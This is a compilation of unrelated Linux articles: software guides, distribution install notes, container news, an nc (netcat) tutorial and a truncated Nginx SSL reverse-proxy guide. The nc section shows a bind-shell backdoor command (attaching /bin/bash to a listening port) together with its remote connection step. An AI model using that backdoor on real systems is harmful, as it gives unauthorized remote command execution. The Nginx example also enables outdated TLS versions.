GameHub – A Unified Library To Put All Games Under One Roof

GameHub is a unified gaming library that lets you view, install, run and remove games on the GNU/Linux operating system. It supports both native and non-native games from various sources, including Steam, GOG, Humble Bundle and Humble Trove. Non-native games run through compatibility layers such as Wine, Proton, DOSBox, ScummVM and RetroArch. It also lets you add custom emulators and download bonus content and DLC for GOG games. Simply put, GameHub is a frontend for Steam, GOG, Humble Bundle and RetroArch that can use Steam technologies such as Proton to run Windows-only GOG games. GameHub is a free, open source gaming platform written in Vala using GTK+3. If you're looking for a way to manage all your games under one roof, GameHub might be a good choice.

Installing GameHub

The author of GameHub designed it specifically for elementary OS. You can install it on Debian, Ubuntu, elementary OS and other Ubuntu derivatives using the GameHub PPA.

$ sudo apt install --no-install-recommends software-properties-common
$ sudo add-apt-repository ppa:tkashkin/gamehub
$ sudo apt update
$ sudo apt install com.github.tkashkin.gamehub

GameHub is available in the AUR, so you can install it on Arch Linux and its variants using any AUR helper, for example Yay.

$ yay -S gamehub-git

It is also available as AppImage and Flatpak packages on the releases page.

If you prefer AppImage package, do the following:

$ wget https://github.com/tkashkin/GameHub/releases/download/0.12.1-91-dev/GameHub-bionic-0.12.1-91-dev-cd55bb5-x86_64.AppImage -O gamehub

Make it executable:

$ chmod +x gamehub

And, run GameHub using command:

$ ./gamehub

If you prefer Flatpak, build the package by running the following commands one by one.

$ git clone https://github.com/tkashkin/GameHub.git
$ cd GameHub
$ scripts/build.sh build_flatpak

Put All Games Under One Roof

Launch GameHub from menu or application launcher. At first launch, you will see the following welcome screen.


GameHub welcome screen

As you can see in the above screenshot, you need to log in to the supported sources, namely Steam, GOG and Humble Bundle. If you don't have the Steam client on your Linux system, you need to install it first to access your Steam account. For GOG and Humble Bundle, click on the respective icon to log in to that source.

Once you have logged in to your account(s), all games from all sources will be visible on the GameHub dashboard.


GameHub Dashboard

You will see the list of logged-in sources in the top left corner. To view the games from a particular source, just click on its icon.

You can also switch between list and grid views, sort the games by applying filters, and search the list from the GameHub dashboard.

Installing a game

Click on a game of your choice from the list and click the Install button. If the game is non-native, GameHub will automatically choose a compatibility layer (e.g. Wine) suited to running it and install the selected game. As you can see in the screenshot below, the Indiana Jones game is not available for the Linux platform.

Install a game

If it is a native game (i.e. it supports Linux), simply press the Install button.


If you don’t want to install the game, just hit the Download button to save it in your games directory. It is also possible to add locally installed games to GameHub using the Import option.

GameHub Settings


GameHub Settings window

The GameHub Settings window can be opened by clicking on the four-line menu icon in the top right corner.

From the Settings section, we can enable, disable and configure various options, such as:

  • Switch between light/dark themes.
  • Use Symbolic icons instead of colored icons for games.
  • Switch to compact list.
  • Enable/disable merging games from different sources.
  • Enable/disable compatibility layers.
  • Set games collection directory. The default directory for storing the collection is $HOME/Games/_Collection.
  • Set games directories for each source.
  • Add/remove emulators.
  • And many more.

For more details, refer to the project links given at the end of this guide.

Cheers!

Resources:

Source

Download Android-x86 8.1-r1

Android-x86 is a port of the Android open source mobile operating system to the x86 (32-bit) architecture, allowing users to run Android applications and replace their existing operating system with the Android OS.

Features at a glance

Key features include a KMS (Kernel Mode Setting) enabled Linux kernel 3.10.x LTS, Wi-Fi support, battery status, V4L2 camera support, G-sensor, Bluetooth, suspend/resume, audio through ALSA, and mouse wheel support.

In addition, it supports software mouse cursor, external monitors, debug mode through Busybox, external keyboards, netbook native resolution, better disk installer, as well as external storage automatic mount.

Distributed as a 32-bit Live CD

It is distributed as a single Live CD ISO image that supports only the 32-bit hardware platform. From the boot prompt you can start the live environment with default settings, with the VESA framebuffer, or using the debug mode. It is also possible to install the OS to a local disk drive.
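If you want to try it from a USB stick instead of optical media, the ISO can be written with dd; a minimal sketch (the ISO filename and /dev/sdX device name are illustrative; double-check the device name, as this command overwrites the target):

```shell
# Write the Android-x86 ISO to a USB stick (replace /dev/sdX with your
# actual device; all existing data on it will be destroyed).
sudo dd if=android-x86-8.1-r1.iso of=/dev/sdX bs=4M status=progress
sync   # flush buffers before unplugging the stick
```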

Originally designed as a collection of patches for Android x86 support, the project has matured enough in recent years to be seriously considered a good alternative operating system for personal computers.

Supported computers

So far, Android-x86 has been tested only on ASUS Eee PC platforms, the ViewSonic ViewPad 10 tablet, the Dell Inspiron Mini Duo hybrid laptop, the Samsung Q1U UMPC device, the Viliv S5 handheld PC, and the Lenovo ThinkPad X61 tablet.

The project is in active development. The final release will integrate support for multiple targets, multi-touch touchpads, better power management and multimedia support, OpenGL ES hardware acceleration for Intel and ATI Radeon graphics cards, and an OpenGL emulation layer.

Conclusions

In conclusion, if you ever wanted to run Android on a desktop computer or laptop, the Android-x86 does just that. It allows users to install the Android OS or just use it directly from a USB flash drive or optical media on their personal computers.

DOWNLOAD Android-x86 8.1-r1

Source

Testing openSUSE, Manjaro, Debian, Fedora, and Mint Linux distributions on my new laptop

Due to the recent unfortunate demise of a couple of my computers I found myself in need of a new laptop on rather short notice. I found an Acer Aspire 5 on sale at about half price here in Switzerland, so I picked one up. I have been installing a number of Linux distributions on it, with mostly positive results.

First, some information about the laptop itself. It is an Acer Aspire 5 A515-52:

  • Intel Core i5-8265U CPU (Quad-core), 1.6GHz (max 3.4GHz)
  • 8GB DDR4 Memory
  • 256GB SSD + 1TB HD
  • 15.6″ 1920×1080 Display
  • Intel HD Graphics 620
  • Realtek RTL8411 Gigabit Ethernet (RJ45)
  • Intel 802.11ac WiFi
  • Bluetooth 5.0
  • 1xUSB3.1 Type C, 1xUSB3.0 Type A, 2xUSB2.0 Type A
  • HDMI Port
  • SD-Card Reader
  • 36.34 cm x 24.75 cm x 1.8 cm, 1.9 kg

That’s a pretty impressive configuration, especially considering that the regular list price here in Switzerland is CHF 1,199 (~ £945 / €1,065), and it is currently on sale at one of the large electronic stores here for CHF 699 (~ £550, €620).

acer-aspire-5-a515-52-56un.jpg

Acer Aspire 5.

I am particularly pleased and impressed that it has both SSD and HD disks. Also, the screen frame is very narrow, which keeps the overall size of the laptop down; it is surprisingly small for a 15.6″ unit, actually not much larger than the 14″ ASUS laptop I have been using.

If there is anything negative about this laptop, it’s the all-plastic case, and the fact that the keyboard doesn’t feel terribly solid. I will be carrying it with me on my weekly commute between Switzerland and Amsterdam, so we’ll see how it holds up.

My first task was to load the usual array of Linux distributions on it, which required some adjustments to the firmware configuration (press F2 during boot):

  • F12 Boot Menu Enabled
  • Set Supervisor password
  • Secure Boot Disabled
  • Function Key Behavior Function Key (not Media Key)

A couple of quick comments about these: Enabling F12 on boot lets you select the USB stick or a Linux partition; setting the Supervisor Password is required before you will be able to disable Secure boot; disabling Secure Boot is not necessary for all Linux distributions, but it is for some, and as I am still convinced that for 99% of the people Secure Boot is a ridiculously over-complicated solution for a practically non-existent threat, I choose to make my life easier by disabling it. Note that I only disable Secure Boot, I do not select Legacy Boot. The Function Key Behavior is set to Media Key by default, which is guaranteed to drive me completely insane — the idea is that with this you get the Fn-key functions by default, and you have to press and hold the Fn-key to get normal Function Key operation. See why it drives me crazy?

Next, I wanted to be sure that this laptop was actually going to work properly with Linux before actually installing it. I still have a Linux Mint USB stick handy from my recent Mint 19.1 upgrades, so I plugged that stick into the Aspire 5, crossed my fingers, booted and pressed F12 (not easy to do with my fingers crossed!). The boot select menu came up, offering Windows 10 and… uh… Linpus Lite? That seems more than a bit odd. A bit of poking around convinced me that the “Linpus” option was actually the Mint Live USB stick, so I went ahead and selected that to boot.

To my great pleasure, it came right up, and everything looked good! The display resolution was right, keyboard and mouse worked, wired and wireless networking worked… as far as I could tell, it was all good.

So I was then ready to load my usual selection of Linux distributions. Here is a short summary of what I have done so far:

openSUSE Tumbleweed

Get the latest full snapshot from the downloads directory. Note that this is only an Installation DVD image, not a Live image, although those are also available in the same directory. I chose to use the installation image because it has a more complete set of software packages so, for example, I can choose the desktop I want during the installation. I copied the ISO to a USB stick, booted that (with F12 on boot), and the installer came up. The installation was absolutely routine, and took less than 15 minutes. In the disk partitioning stage I put the root filesystem on the SSD and home on the HD.


Like many systems using UEFI firmware today, the Aspire 5 doesn’t like to have the boot list modified by the operating system, so even though I checked this after installation was complete, and saw that openSUSE was at the top of the list, it “helps” you by putting Windows back at the top. Grrr. So I had to go back to the firmware configuration (F2 at startup), then in the Boot menu it shows the boot order. Interestingly, openSUSE is correctly identified in this list (it’s not called Linpus Lite). I moved that to the top of the list, saved and rebooted, and openSUSE came right up. Hooray!

Acer Aspire 5 running openSUSE Tumbleweed.

Image: J.A. Watson

Everything seems to be working perfectly. In addition to the major things I had already checked, at this point I went through all of the F-key functions, and they all worked as well: Audio Up/Down/Mute, Brightness Up/Down, Touchpad Disable/Enable, Wireless Disable/Enable, and Suspend/Resume. Good stuff!

Manjaro

The ISO images are in the Manjaro Downloads directory, with different Live images for Xfce, KDE, Cinnamon, and much more. Copy the ISO to a USB stick, and boot that to get the Manjaro Live desktop of your choice. After verifying that everything is working, you can run the installer from the desktop; once again, installation is very easy, I put the root filesystem on the SSD and home on the HD. The entire process took less than 15 minutes. On reboot it brought up openSUSE again, so there are a couple of options here. The obvious one is to press F12 on boot, and select Manjaro from the boot list. Alternatively, you could go back to the firmware setup, where you will find Manjaro somewhere lower in the Boot list, and move it to the top if you want to boot it by default; or let openSUSE come up, and create a new Grub configuration file with grub2-mkconfig, which will then include Manjaro in the list it offers on boot.

Acer Aspire 5 running Manjaro 18.0.2.

Image: J.A. Watson

As with openSUSE, everything seems to work perfectly. So far this is really a treat!

Debian GNU/Linux

There is a link to the latest 64-bit PC network installer on the Debian home page, or you can go to Getting Debian to choose from the full list of installation images. There you will find a variety of Live images, as well as other architectures and Cloud images.

The network installer image is very small (currently less than 300MB), and contains only what is necessary to boot your computer and get the installer running. You have to have an internet connection to perform the installation (duh); after going through the installation dialog it will then download only the packages needed for your selections. This means that the installation process will take longer than one that gets everything from a USB stick, but it will only download what it needs (probably less than a complete ISO image), and the installation will get all of the latest packages, so you won't have a lot of updating to do when it is finished.

On the Aspire 5 using a gigabit wired connection, the installation took less than 30 minutes. When it was done I rebooted, and used F12 to boot Debian.

Acer Aspire 5 running Debian GNU/Linux.

Image: J.A. Watson

This was where I ran into my first significant problem with Linux on this laptop. The touchpad didn’t work. That blasted thing! It’s actually not a touchpad, it is an accursed clickpad! GRRR! I’ve been biting my tongue until now, because at least the stupid thing worked OK (well, as OK as is possible) with the first two distributions I installed, but now surprise, surprise, it doesn’t work.

My intention was not to stay with the current Debian Stable release (stretch), but to go on to Debian Testing. So I decided to just use a USB mouse, and continue the installation in the hope that a later release would take care of this problem.


I then also noticed that the Wi-Fi adapter wasn’t recognized (no wireless networks were shown). Sigh. Well, that’s at least not too surprising, because the Aspire 5 has an Intel Wi-Fi adapter, and the drivers for those are not FOSS, so they aren’t included in the base Debian distribution. So I went to /etc/apt/sources.list, and added contrib and non-free to that, then went to the synaptic package manager, searched for iwlwifi and installed that package. After a reboot, the wireless networking was OK (yay).
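That sources.list edit can be scripted rather than done by hand; here's a small sketch using sed, demonstrated on a local copy of the file (on a real system the target is /etc/apt/sources.list and the commands need root; the repository line shown is just an illustration):

```shell
# Work on a local copy to illustrate the edit.
echo 'deb http://deb.debian.org/debian stretch main' > sources.list
# Append the contrib and non-free components to lines ending in "main".
sed -i 's/ main$/ main contrib non-free/' sources.list
cat sources.list
# deb http://deb.debian.org/debian stretch main contrib non-free
```

After that, `apt update` makes the non-free packages (such as the Intel Wi-Fi firmware) available to install.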

The next step was to upgrade from Debian Stable to Debian Testing. Once again I edited /etc/apt/sources.list, this time changing every occurrence of stretch to testing. Then I ran a full distribution upgrade; I prefer to do this from the CLI:

apt-get update && apt-get dist-upgrade && apt-get autoremove

This took another 20 minutes or so to run, after which I rebooted and was running Debian GNU/Linux Testing (buster/sid). Unfortunately, the stupid clickpad was still not working. Well, I’ve got better things to do at the moment than fight with that, so I decided to press on with the other installations.

Fedora

Next on my Linux distribution hit list is Fedora Workstation. The ISO image is available from the Workstation Download page; this gets you the 64-bit PC version with the Gnome 3 desktop. Other versions and different desktops are listed in the Fedora 29 Release Announcement.

The Fedora ISO is basically a Live image, although during boot it asks if you want to go to the Live desktop, or simply go directly to the installer. If you choose the Live desktop you can confirm that everything is working (including the idiotic clickpad), and then start the installer from the desktop.

The Fedora installer (anaconda) has been slightly modified with this release. Account setup has been removed from anaconda and given over to the Gnome first-boot sequence. This makes the installation a little bit simpler, I suppose. Anyway, installation once again took less than 15 minutes, and I rebooted (via F12) after it was complete.

Acer Aspire 5 running Fedora 29 Workstation.

Image: J.A. Watson

No surprises this time, everything works, and it looks wonderful (if you like the Gnome 3 desktop).

Linux Mint

The final candidate in this initial batch is Linux Mint. Although I don’t use Mint on a day-to-day basis, it is still the one that I recommend to anyone who asks me about getting started with Linux.

The Mint Downloads page offers Live ISO images for both 32-bit and 64-bit versions, with Cinnamon, MATE or Xfce desktops. I already had the 64-bit Cinnamon version on a USB stick (which I had used for the initial tests of this laptop), so I just used that for the installation. As with Manjaro Linux, the USB stick boots directly to a Live desktop, with the installer on the desktop. The installation was once again easy, and very fast; in about 10 minutes I was rebooting to the installed Linux system.

Acer Aspire 5 running Linux Mint 19.1.

Image: J.A. Watson

Once again, everything works perfectly.

That’s enough for the first group — and honestly, it’s getting a bit boring to keep writing “Installation was smooth and easy, and everything worked perfectly”. So to summarize:

  • Starting with a brand new, out of the box Acer Aspire 5 laptop
  • I completely ignored the pre-installed Windows 10 operating system
  • I modified the UEFI firmware configuration to enable Boot Select (F12), and disable UEFI Secure Boot
  • I have successfully installed five different Linux distributions
  • I only ran into two significant problems, both on the same distribution; one could be fixed with some small changes, while the other I have not yet found a solution or work-around for
  • On the other four distributions, everything in the Aspire 5 works perfectly
  • I am already using this laptop as my primary system

I will continue with a few other distributions over the next week, and will report success or problems in a few days.


Source

Linux Today – Red Hat Advances Container Technology With Podman 1.0

Red Hat’s competitive Docker container effort hits a major milestone with the release of Podman 1.0, which looks to provide improved performance and security for containers.

Podman

Red Hat announced the 1.0 release of its open-source Podman project on Jan. 17, which provides a fully featured container engine.

In Podman 1.0, Red Hat has integrated multiple core security capabilities in an effort to enable organizations to run containers securely. Among the security features are rootless containers and enhanced user namespace support for better container isolation.

Containers provide a way for organizations to run applications in a virtualized approach on top of an existing operating system. With the 1.0 release, Red Hat is now also positioning Podman as an alternative to the Docker Engine technology for application container deployment.

“We felt the sum total of its features, as well as the project’s performance, security and stability, made it reasonable to move to 1.0,” Scott McCarty, product manager of containers at Red Hat, told eWEEK. “Since Podman is set to be the default container engine for the single-node use case in Red Hat Enterprise Linux 8, we wanted to make some pledges about its supportability.”

McCarty explained that for clusters of container nodes, the CRI-O technology within the Red Hat OpenShift Container Platform will be the default. The OpenShift Container Platform is Red Hat’s distribution of the Kubernetes container orchestration platform.

Red Hat already integrated a pre-1.0 version of Podman in its commercially supported Red Hat Enterprise Linux (RHEL) 7.6 release in October 2018. McCarty said that both RHEL 7 and RHEL 8 will be updated to include Podman 1.0. RHEL 8 is currently in private beta.

OpenShift

CRI-O is a Kubernetes container runtime and is at the core of Red Hat’s OpenShift. CRI-O reached its 1.0 milestone in October 2017. McCarty said Podman was originally designed to be used on OpenShift Nodes to help manage containers/storage under CRI-O, but it has grown into so much more.

“First and foremost, Podman is designed to be used by humans—it’s easy to use and has a very intuitive command-line experience,” McCarty said.

A user interacts with Podman at the node level—this includes finding, running, building and sharing containers on a single node. Even in clusters of thousands of container hosts, McCarty said it's useful to have a feature-rich tool like Podman available to troubleshoot and tinker with individual nodes.

“One main challenge to adopting Kubernetes is the learning curve on the Kubernetes YAML, which defines running containers,” McCarty said.

Kubernetes YAML provides configuration information to get containers running. To help onramp users to Red Hat OpenShift, McCarty said Podman has the “podman generate kube” command. With that feature, a Podman user can interactively create a pod on the host, which Podman can then create and export as Kubernetes-compatible YAML.

“This YAML can then be used by OpenShift to create the same pod or container inside of Kubernetes, in any cluster or even multiple times within the same cluster, stamping out many copies anywhere the application is needed,” McCarty explained. “The user doesn’t even have to know how to write Kubernetes YAML, which is a big help for people new to the container orchestration engine.”
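The workflow McCarty describes might look something like this sketch (assuming Podman is installed; the container name, image and port mapping are illustrative):

```shell
# Run a container interactively on the host...
podman run -d --name web -p 8080:80 docker.io/library/nginx
# ...then export it as Kubernetes-compatible YAML:
podman generate kube web > web-pod.yaml
# web-pod.yaml can now be handed to OpenShift/Kubernetes, e.g.:
#   oc create -f web-pod.yaml
```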

Security

One of the key attributes of Podman is the improved security. A challenge with some container deployments is that they are deployed with root access privileges, which can lead to risk.

On Jan. 14, security vendor CyberArk reported one such privileged container risk on the Play-with-Docker community site that could have potentially enabled an attacker to gain access to the underlying host. With containers, the basic idea is that the running containers are supposed to be isolated, but if a user has root privileges, that isolation can potentially be bypassed.

Podman has the concept of rootless containers that do not require elevated privileges to run. McCarty said that to use rootless containers, the user doesn’t need to do anything special.

Another key concept with Podman is that it does not require a new system daemon to run. Dan Walsh, consulting software engineer at Red Hat, explained that if a user is going to run a single service as a container, then having to set up another service to just run the container is a big overhead.

“Forcing all of your containers to run through a single daemon forces you to have a least common denominator for default security for your containers,” Walsh told eWEEK. “By separating out the containers engines into separate tools like CRI-O, Buildah and Podman, we can give the proper level of security for each engine.”

Walsh added that Podman also enables users to run each container in a separate user namespace, providing further isolation. From a security auditing perspective, he noted that the “Podman top” command can be used to actually reveal security information about content running within the container.

Podman Usage

Red Hat is seeing a lot of usage for Podman as a replacement for the Docker Engine for running containers in services on hosts, according to McCarty.

The Fedora and openSUSE communities seem to be taking the lead on adopting Podman, McCarty said, but Red Hat has also seen it packaged and used in many other distributions, including Ubuntu, Debian, Arch and Gentoo, to name a few.

“Podman essentially operates at native Linux speeds, since there is no daemon getting in the way of handling client/server requests,” he said.

Related Stories:

Source

Getting started with Sandstorm, an open source web app platform

Learn about Sandstorm, the third in our series on open source tools that will make you more productive in 2019.


There seems to be a mad rush at the beginning of every year to find ways to be more productive. New Year’s resolutions, the itch to start the year off right, and of course, an “out with the old, in with the new” attitude all contribute to this. And the usual round of recommendations is heavily biased towards closed source and proprietary software. It doesn’t have to be that way.

Here’s the third of my picks for 19 new (or new-to-you) open source tools to help you be more productive in 2019.

Sandstorm

Being productive isn't just about to-do lists and keeping things organized. Often it requires a suite of tools linked together to make a workflow go smoothly.

Sandstorm main window

Sandstorm is an open source collection of packaged apps, all accessible from a single web interface and managed from a central console. You can host it yourself or use the Sandstorm Oasis service—for a per-user fee.
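If you choose to self-host, Sandstorm provides an install script; a sketch of the documented one-liner (run it on a server you control, and review the script first if piping a download into a shell makes you uncomfortable):

```shell
# Fetch and run Sandstorm's installer script.
curl https://install.sandstorm.io | bash
```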

Sandstorm App admin panel

Sandstorm has a marketplace that makes it simple to install the apps that are available. It includes apps for productivity, finance, note taking, task tracking, chat, games, and a whole lot more. You can also package your own apps and upload them by following the application-packaging guidelines in the developer documentation.

Sandstorm Grains

Once installed, a user can create grains—basically containerized instances of app data. Grains are private by default and can be shared with other Sandstorm users. This means they are secure by default, and users can choose what to share with others.

Sandstorm authentication options

Sandstorm can authenticate from several different external sources as well as use a “passwordless” email-based authentication. Using an external service means you don’t have to manage yet another set of credentials if you already use one of the supported services.

In the end, Sandstorm makes installing and using supported collaborative apps quick, easy, and secure.

Source

Download PDF Split and Merge Linux 4.0.1

PDF Split and Merge – Easily split and merge PDF files on Linux

The PDF Split and Merge project is an easy-to-use tool that provides functions to split and merge PDF files or subsections of them.

To install, just unzip the archive into a directory and double-click the pdfsam-x.x.jar file, or open a terminal and type the following command in the folder where you extracted the archive:

java -jar /pathwhereyouunzipped/pdfsam-x.x.jar


New in PDF Split and Merge 2.2.2:

  • Added recent environments menu
  • New MSI installer suitable for silent and Active Directory installs (feature request #2977478) (bug #3383859)
  • Console: regexp matching on the bookmarks name when splitting by bookmark level
  • Added argument skipGui that can be passed to skip the GUI restore

Read the full changelog


Source

10GbE Linux Networking Performance Between CentOS, Fedora, Clear Linux & Debian

For those curious how 10 Gigabit Ethernet performance compares between current Linux distributions, here are some benchmarks as we ramp up more 10GbE Linux/BSD/Windows benchmark comparisons. This round of testing was done on two distinctly different servers running CentOS, Debian, Clear Linux, and Fedora.

This is the first of several upcoming 10GbE test comparisons. For this article we are testing some of the popular enterprise Linux distributions, while follow-up articles will look at some other distros as well as Windows Server and FreeBSD/DragonFlyBSD. CentOS 7, Debian 9.6, Clear Linux rolling, and Fedora Server 29 were the operating systems tested for this initial round.

The first server tested was the Dell PowerEdge R7425 with dual AMD EPYC 7601 processors, 512GB of DDR4 system memory, and Samsung 860 500GB SSD. The PowerEdge R7425 server features dual 10GbE RJ45 Ethernet ports using a Broadcom BCM57417 NetXTreme-E 10GBase-T dual-port controller. For this testing a CAT7 cable was connecting the server to the 10GbE switch.

The second server tested was the Tyan S7106 1U server with two Xeon Gold 6138 processors, 96GB of DDR4 memory, and a Samsung 970 EVO SSD; for 10GbE connectivity a PCIe card with a QLogic cLOM8214 controller was used, connected via a 10G SFP+ DAC cable. This testing isn't meant to compare performance between these distinctly different servers, but rather to look at 10GbE performance across the multiple Linux distributions.

All four distributions were cleanly installed on each system and tested in their stock configuration with the default kernels and all stable release updates applied.

The system running all of the server processes for the networking benchmarks was an AMD Ryzen Threadripper 2920X system with Gigabyte X399 AORUS Gaming 7 motherboard, 16GB of RAM, 240GB Corsair Force MP510 NVMe SSD, and using a 10GbE PCIe network card with QLogic cLOM8214 controller. That system was running Ubuntu 18.04 LTS.
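The article doesn't detail the exact test harness, but raw 10GbE throughput tests of this kind are commonly run with a tool like iperf3; a sketch (the hostname and options are illustrative):

```shell
# On the server under test:
iperf3 -s
# On the client (the Threadripper box in this setup), run a
# 30-second test with 4 parallel streams:
iperf3 -c server-under-test -t 30 -P 4
```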
Source

NC command (NCAT) for beginners

The nc (ncat) command is used for network-related maintenance and diagnostic tasks. It can perform operations like reading, writing or redirecting data over the network, similar to how you can use the cat command to manipulate files on a Linux system. nc can be used as a port-scanning utility, for monitoring, or as a basic TCP proxy.

Organizations can use it to review the security of their networks, web servers, telnet servers, mail servers and so on, by checking which ports are open and then securing them. nc can also be used to capture information being sent by a system.


Now let’s discuss how we can use NC command with some examples,


Examples for NC command


Connect to a remote server

The following example shows how we can connect to a remote server with the nc command,

$ nc 10.10.10.100 80

here, 10.10.10.100 is the IP of the server we want to connect to & 80 is the port number on the remote server. Once connected, we can perform other functions. For example, we can fetch the full page content with

GET / HTTP/1.1

or request a particular page by name (replace page.html with the page you want),

GET /page.html HTTP/1.1

or we can grab the banner for OS fingerprinting with the following,

HEAD / HTTP/1.1

This will tell us what software & version is being used to run the web server.
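Typing the request interactively is fiddly because HTTP expects CRLF line endings and a blank line at the end of the request. A non-interactive alternative is to build the request with printf and pipe it into nc (example.com and port 80 here are placeholders for whichever host you are probing):

```shell
# Build a minimal HTTP/1.1 HEAD request; \r\n gives the CRLF endings HTTP wants,
# and the final blank line tells the server the request is complete.
printf 'HEAD / HTTP/1.1\r\nHost: example.com\r\nConnection: close\r\n\r\n' \
    | nc example.com 80
```

The response headers (Server: in particular) come back on stdout, which also makes them easy to grep.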


Listen to inbound connection requests

To make a server listen for incoming connection requests on a port number, use the following example,

$ nc -l 8080

Now nc is in listening mode, watching port 8080 for incoming connection requests. Listening mode keeps running until terminated manually, but we can limit it with the '-w' (timeout) option,

$ nc -w 10 -l 8080

here, nc will wait for 10 seconds only. Note that the behaviour of '-w' in listen mode varies between nc implementations; the OpenBSD netcat, for example, ignores '-w' when '-l' is used.


Connecting to UDP ports

By default nc connects to TCP ports, but to listen for incoming requests made to UDP ports we have to use the '-u' option,

$ nc -l -u 55


Using NC for Port forwarding

With the '-c' option of nc (which runs a shell command), we can redirect one port to another. A complete example is,

$ nc -u -l 8080 -c 'nc -u -l 8090'

here, all incoming requests on port 8080 are forwarded to port 8090. Note that '-c' exists in traditional netcat & in ncat, but not in the OpenBSD variant.


Using NC as Proxy server

To use the nc command as a proxy, use

$ nc -l 8080 | nc 10.10.10.200 80

here, all incoming connections to port 8080 will be diverted to the 10.10.10.200 server on port 80.

With the above command, we have only created a one-way passage. To create a return path, i.e. a two-way communication channel, use the following commands,

$ mkfifo 2way

$ nc -l 8080 0<2way | nc 10.10.10.200 80 1>2way

Now you will be able to send and receive data over the nc proxy.
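The named-pipe trick above is easier to see with plain shell tools: a FIFO lets one process's output feed another process's input. A minimal local demonstration, with no network involved and only temporary paths:

```shell
tmp=$(mktemp -d)
mkfifo "$tmp/2way"                    # create the named pipe, as mkfifo does above
cat "$tmp/2way" > "$tmp/out" &        # reader: blocks until a writer opens the FIFO
echo "hello over fifo" > "$tmp/2way"  # writer: data flows through the pipe
wait                                  # wait for the background reader to finish
cat "$tmp/out"                        # prints: hello over fifo
rm -r "$tmp"
```

In the nc proxy above, the FIFO carries the return traffic (server back to client) while the shell pipe carries the forward traffic, which is what turns two one-way channels into a two-way one.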


Using NC as chat tool

Another use nc can serve is as a chat tool. Yes, we can also use it for chatting. First, run the following command on one server,

$ nc -l 8080

Then, to connect from the remote machine, run

$ nc 10.10.10.100 8080

Now we can start a conversation using the terminal/CLI.


Using NC to create a system backdoor

This is one of the most common applications of nc & the one most abused by attackers. It creates a backdoor into a system that can then be exploited (you should not do this; it is wrong, and illegal on systems you do not own).
One must be aware of it in order to safeguard against this kind of exploit.

Following command can be used to create a backdoor,

$ nc -l 5500 -e /bin/bash

here, we have attached port 5500 to /bin/bash, which can now be connected to from a remote machine to execute commands (note that '-e', like '-c', is not available in the OpenBSD netcat),

$ nc 10.10.10.100 5500


Force server to remain up

A server stops listening once a client connection has been terminated. But with the '-k' option, we can force a server to keep running even when no client is connected.

$ nc -l -k 8080


This concludes our tutorial on how to use the nc command; please feel free to send in any questions or queries you have regarding this article.

Source

Simple guide to configure Nginx reverse proxy with SSL

A reverse proxy is a server that takes requests made over the web (i.e. HTTP & HTTPS) and forwards them to a backend server (or servers). A backend server can be a single application server or a group of them, such as Tomcat, WildFly or Jenkins, or it can even be another web server like Apache.

We have already discussed how to configure a simple HTTP reverse proxy with Nginx. In this tutorial, we will discuss how to configure an Nginx reverse proxy with SSL. So let's start with the procedure to configure an Nginx reverse proxy with SSL,

Recommended Read : The (in)complete Guide To DOCKER FOR LINUX

Also Read : Beginner’s guide to SELinux

Pre-requisites

– A backend server: For the purpose of this tutorial we are using a Tomcat server running on localhost at port 8080. If you want to learn how to set up an Apache Tomcat server, please read this tutorial.

Note: Make sure that the application server is up before you start proxying requests.

– SSL cert: We also need an SSL certificate to configure on the server. We can use a Let's Encrypt certificate; you can get one using the procedure mentioned HERE. But for this tutorial, we will be using a self-signed certificate, which can be created by running the following command from the terminal,

$ openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/nginx/ssl/cert.key -out /etc/nginx/ssl/cert.crt

You can also read more about self-signed certificates HERE.
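To sanity-check the certificate once generated, openssl can print its subject back. A quick sketch, using a temporary directory and an illustrative -subj value so the command runs without interactive prompts (adjust the CN to your own domain):

```shell
tmp=$(mktemp -d)
# Same command as above, but with -subj so openssl asks no questions
openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
    -keyout "$tmp/cert.key" -out "$tmp/cert.crt" \
    -subj "/CN=linuxtechlab.com" 2>/dev/null
# Print the subject of the certificate we just created
openssl x509 -in "$tmp/cert.crt" -noout -subject
rm -r "$tmp"
```

The subject line should echo the CN you supplied; in the same way, `openssl x509 -in cert.crt -noout -dates` shows the validity window set by -days.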

The next step in configuring an nginx reverse proxy with SSL is nginx installation,


Install Nginx


Ubuntu

Nginx is available in the default Ubuntu repositories, so simply install it using the following command,

$ sudo apt-get update && sudo apt-get install nginx

CentOS/RHEL

We need to add some extra repos to install nginx on CentOS, & we have created a detailed ARTICLE HERE on nginx installation for CentOS/RHEL.

Now start the service & enable it at boot,

# systemctl start nginx

# systemctl enable nginx

Now to check the nginx installation, open a web browser & enter the system IP as the URL; getting the default nginx webpage confirms that nginx is working fine.


Configuring Nginx reverse proxy with SSL

We now have everything we need to configure an nginx reverse proxy with SSL. We will be making the configuration in the default nginx configuration file, i.e. '/etc/nginx/conf.d/default.conf'.

Assuming this is the first time we are making any changes to the configuration, open the file & delete or comment out all the old content, then make the following entries into the file,

# vi /etc/nginx/conf.d/default.conf

server {
    listen 80;
    return 301 https://$host$request_uri;
}

server {
    listen 443;
    server_name linuxtechlab.com;

    ssl_certificate /etc/nginx/ssl/cert.crt;
    ssl_certificate_key /etc/nginx/ssl/cert.key;
    ssl on;
    ssl_session_cache builtin:1000 shared:SSL:10m;
    ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
    ssl_ciphers HIGH:!aNULL:!eNULL:!EXPORT:!CAMELLIA:!DES:!MD5:!PSK:!RC4;
    ssl_prefer_server_ciphers on;

    access_log /var/log/nginx/access.log;

    location / {
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        proxy_pass http://localhost:8080;
        proxy_read_timeout 90;
        proxy_redirect http://localhost:8080 https://linuxtechlab.com;
    }
}

Once all the changes have been made, save the file & exit. Before we restart the nginx service to apply the changes, let's discuss the configuration we have made, section by section,

Section 1

server {
    listen 80;
    return 301 https://$host$request_uri;
}

here, we have told nginx to listen for any request made on port 80 & redirect it to https,

Section 2

listen 443;
server_name linuxtechlab.com;

ssl_certificate /etc/nginx/ssl/cert.crt;
ssl_certificate_key /etc/nginx/ssl/cert.key;
ssl on;
ssl_session_cache builtin:1000 shared:SSL:10m;
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl_ciphers HIGH:!aNULL:!eNULL:!EXPORT:!CAMELLIA:!DES:!MD5:!PSK:!RC4;
ssl_prefer_server_ciphers on;

These are some of the default nginx SSL options we are using; they tell nginx which protocol versions & SSL ciphers the web server should support,
